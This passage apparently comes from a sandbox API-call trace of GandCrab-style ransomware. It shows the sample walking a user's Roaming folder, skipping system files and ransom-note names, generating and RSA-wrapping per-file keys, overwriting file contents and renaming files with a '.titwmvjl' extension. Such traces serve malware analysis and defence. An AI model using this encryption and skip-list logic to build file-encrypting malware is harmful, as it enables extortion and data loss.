(lpString1="gR1CBuQqpVYIz.png", lpString2="..") returned 1 [0070.044] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="gR1CBuQqpVYIz.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gR1CBuQqpVYIz.png") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gR1CBuQqpVYIz.png" [0070.045] lstrlenW (lpString=".titwmvjl") returned 9 [0070.045] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gR1CBuQqpVYIz.png") returned 55 [0070.045] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.045] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gR1CBuQqpVYIz.png.titwmvjl") returned 64 [0070.045] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gR1CBuQqpVYIz.png") returned 55 [0070.045] lstrlenW (lpString=".png") returned 4 [0070.045] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.045] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".png ") returned 5 [0070.045] lstrcmpiW (lpString1=".png", lpString2=".titwmvjl") returned -1 [0070.045] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.045] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gR1CBuQqpVYIz.png") returned 55 [0070.045] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gR1CBuQqpVYIz.png") returned 55 [0070.045] lstrcmpiW (lpString1="gR1CBuQqpVYIz.png", lpString2="desktop.ini") returned 1 [0070.045] lstrcmpiW (lpString1="gR1CBuQqpVYIz.png", lpString2="autorun.inf") returned 1 [0070.045] lstrcmpiW (lpString1="gR1CBuQqpVYIz.png", lpString2="ntuser.dat") returned -1 [0070.045] lstrcmpiW (lpString1="gR1CBuQqpVYIz.png", lpString2="iconcache.db") returned -1 [0070.045] lstrcmpiW (lpString1="gR1CBuQqpVYIz.png", lpString2="bootsect.bak") returned 1 [0070.045] lstrcmpiW (lpString1="gR1CBuQqpVYIz.png", lpString2="boot.ini") returned 1 [0070.045] lstrcmpiW (lpString1="gR1CBuQqpVYIz.png", lpString2="ntuser.dat.log") returned -1 [0070.045] lstrcmpiW (lpString1="gR1CBuQqpVYIz.png", lpString2="thumbs.db") returned -1 [0070.045] lstrcmpiW (lpString1="gR1CBuQqpVYIz.png", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0070.045] lstrcmpiW (lpString1="gR1CBuQqpVYIz.png", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0070.045] lstrcmpiW (lpString1="gR1CBuQqpVYIz.png", lpString2="KRAB-DECRYPT.html") returned -1 [0070.045] lstrcmpiW (lpString1="gR1CBuQqpVYIz.png", lpString2="CRAB-DECRYPT.html") returned 1 [0070.046] lstrcmpiW (lpString1="gR1CBuQqpVYIz.png", lpString2="KRAB-DECRYPT.txt") returned -1 [0070.046] lstrcmpiW (lpString1="gR1CBuQqpVYIz.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0070.046] lstrcmpiW (lpString1="gR1CBuQqpVYIz.png", lpString2="ntldr") returned -1 [0070.046] lstrcmpiW (lpString1="gR1CBuQqpVYIz.png", lpString2="NTDETECT.COM") returned -1 [0070.046] lstrcmpiW (lpString1="gR1CBuQqpVYIz.png", lpString2="Bootfont.bin") returned 1 [0070.046] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gR1CBuQqpVYIz.png") returned 55 [0070.046] lstrlenW (lpString=".png") returned 4 [0070.046] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.046] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".png ") returned 5 [0070.046] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.046] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.046] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gR1CBuQqpVYIz.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\gr1cbuqqpvyiz.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0070.046] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.047] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0070.047] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.047] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.048] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.048] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.048] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.048] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0070.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.048] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.048] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.049] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.049] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.049] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.049] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.050] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.050] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0070.050] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.050] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.050] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.050] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.050] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.051] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.051] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503638) returned 1 [0070.051] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.051] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.051] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.051] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.051] GetLastError () returned 0x0 [0070.051] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.052] CryptDestroyKey (hKey=0x503638) returned 1 [0070.052] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.052] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.052] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.052] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.052] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.052] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503578) returned 1 [0070.053] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.053] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.053] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.053] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.053] GetLastError () returned 0x0 [0070.053] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.053] CryptDestroyKey (hKey=0x503578) returned 1 [0070.053] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.053] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.053] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0070.054] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0070.054] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0x522e, lpOverlapped=0x0) returned 1 [0070.059] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffadd2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.060] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x522e, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0x522e, lpOverlapped=0x0) returned 1 [0070.062] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.062] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0070.063] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.067] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.067] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.067] CloseHandle (hObject=0x2b4) returned 1 [0070.068] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gR1CBuQqpVYIz.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\gr1cbuqqpvyiz.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gR1CBuQqpVYIz.png.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\gr1cbuqqpvyiz.png.titwmvjl"), dwFlags=0x1) returned 1 [0070.069] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.069] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0070.069] lstrcmpW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2=".") returned 1 [0070.069] lstrcmpW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2="..") returned 1 [0070.069] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="gzz6xbjl_LfVIYqAtg7n.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gzz6xbjl_LfVIYqAtg7n.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gzz6xbjl_LfVIYqAtg7n.gif" [0070.069] lstrlenW (lpString=".titwmvjl") returned 9 [0070.070] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gzz6xbjl_LfVIYqAtg7n.gif") returned 62 [0070.070] VirtualAlloc (lpAddress=0x0, dwSize=0xbc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.070] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gzz6xbjl_LfVIYqAtg7n.gif.titwmvjl") returned 71 [0070.070] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gzz6xbjl_LfVIYqAtg7n.gif") returned 62 [0070.070] lstrlenW (lpString=".gif") returned 4 [0070.070] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.070] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".gif ") returned 5 [0070.070] lstrcmpiW (lpString1=".gif", lpString2=".titwmvjl") returned -1 [0070.070] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.070] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gzz6xbjl_LfVIYqAtg7n.gif") returned 62 [0070.070] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gzz6xbjl_LfVIYqAtg7n.gif") returned 62 [0070.070] lstrcmpiW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2="desktop.ini") returned 1 [0070.070] lstrcmpiW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2="autorun.inf") returned 1 [0070.070] lstrcmpiW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2="ntuser.dat") returned -1 [0070.070] lstrcmpiW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2="iconcache.db") returned -1 [0070.070] lstrcmpiW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2="bootsect.bak") returned 1 [0070.070] lstrcmpiW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2="boot.ini") returned 1 [0070.070] lstrcmpiW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2="ntuser.dat.log") returned -1 [0070.070] lstrcmpiW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2="thumbs.db") returned -1 [0070.070] lstrcmpiW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0070.070] lstrcmpiW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0070.070] lstrcmpiW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2="KRAB-DECRYPT.html") returned -1 [0070.070] lstrcmpiW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2="CRAB-DECRYPT.html") returned 1 [0070.070] lstrcmpiW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2="KRAB-DECRYPT.txt") returned -1 [0070.070] lstrcmpiW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0070.070] lstrcmpiW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2="ntldr") returned -1 [0070.071] lstrcmpiW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2="NTDETECT.COM") returned -1 [0070.071] lstrcmpiW (lpString1="gzz6xbjl_LfVIYqAtg7n.gif", lpString2="Bootfont.bin") returned 1 [0070.071] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gzz6xbjl_LfVIYqAtg7n.gif") returned 62 [0070.071] lstrlenW (lpString=".gif") returned 4 [0070.071] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.071] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".gif ") returned 5 [0070.071] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.071] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.071] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gzz6xbjl_LfVIYqAtg7n.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\gzz6xbjl_lfviyqatg7n.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0070.071] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.071] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0070.072] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.072] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.072] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.073] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.073] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.073] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.073] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0070.073] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.073] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.073] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.073] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.074] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.074] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.074] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.074] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.074] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0070.074] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.074] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.074] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.075] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.075] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503938) returned 1 [0070.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.075] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.076] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.076] GetLastError () returned 0x0 [0070.076] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.076] CryptDestroyKey (hKey=0x503938) returned 1 [0070.076] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.076] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.076] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.076] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.077] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.077] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503578) returned 1 [0070.077] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.077] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.077] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.077] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.077] GetLastError () returned 0x0 [0070.077] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.078] CryptDestroyKey (hKey=0x503578) returned 1 [0070.078] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.078] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.078] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0070.078] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0070.078] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0x7217, lpOverlapped=0x0) returned 1 [0070.084] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff8de9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.084] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x7217, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0x7217, lpOverlapped=0x0) returned 1 [0070.086] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.086] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0070.087] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.092] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.092] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.093] CloseHandle (hObject=0x2b4) returned 1 [0070.094] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gzz6xbjl_LfVIYqAtg7n.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\gzz6xbjl_lfviyqatg7n.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\gzz6xbjl_LfVIYqAtg7n.gif.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\gzz6xbjl_lfviyqatg7n.gif.titwmvjl"), dwFlags=0x1) returned 1 [0070.095] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.095] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0070.095] lstrcmpW (lpString1="H0n8vfZP F84hgjL.gif", lpString2=".") returned 1 [0070.095] lstrcmpW (lpString1="H0n8vfZP F84hgjL.gif", lpString2="..") returned 1 [0070.096] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="H0n8vfZP F84hgjL.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\H0n8vfZP F84hgjL.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\H0n8vfZP F84hgjL.gif" [0070.096] lstrlenW (lpString=".titwmvjl") returned 9 [0070.096] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\H0n8vfZP F84hgjL.gif") returned 58 [0070.096] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.096] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\H0n8vfZP F84hgjL.gif.titwmvjl") returned 67 [0070.096] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\H0n8vfZP F84hgjL.gif") returned 58 [0070.096] lstrlenW (lpString=".gif") returned 4 [0070.096] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.096] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".gif ") returned 5 [0070.096] lstrcmpiW (lpString1=".gif", lpString2=".titwmvjl") returned -1 [0070.097] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.097] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\H0n8vfZP F84hgjL.gif") returned 58 [0070.097] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\H0n8vfZP F84hgjL.gif") returned 58 [0070.097] lstrcmpiW (lpString1="H0n8vfZP F84hgjL.gif", lpString2="desktop.ini") returned 1 [0070.097] lstrcmpiW (lpString1="H0n8vfZP F84hgjL.gif", lpString2="autorun.inf") returned 1 [0070.097] lstrcmpiW (lpString1="H0n8vfZP F84hgjL.gif", lpString2="ntuser.dat") returned -1 [0070.097] lstrcmpiW (lpString1="H0n8vfZP 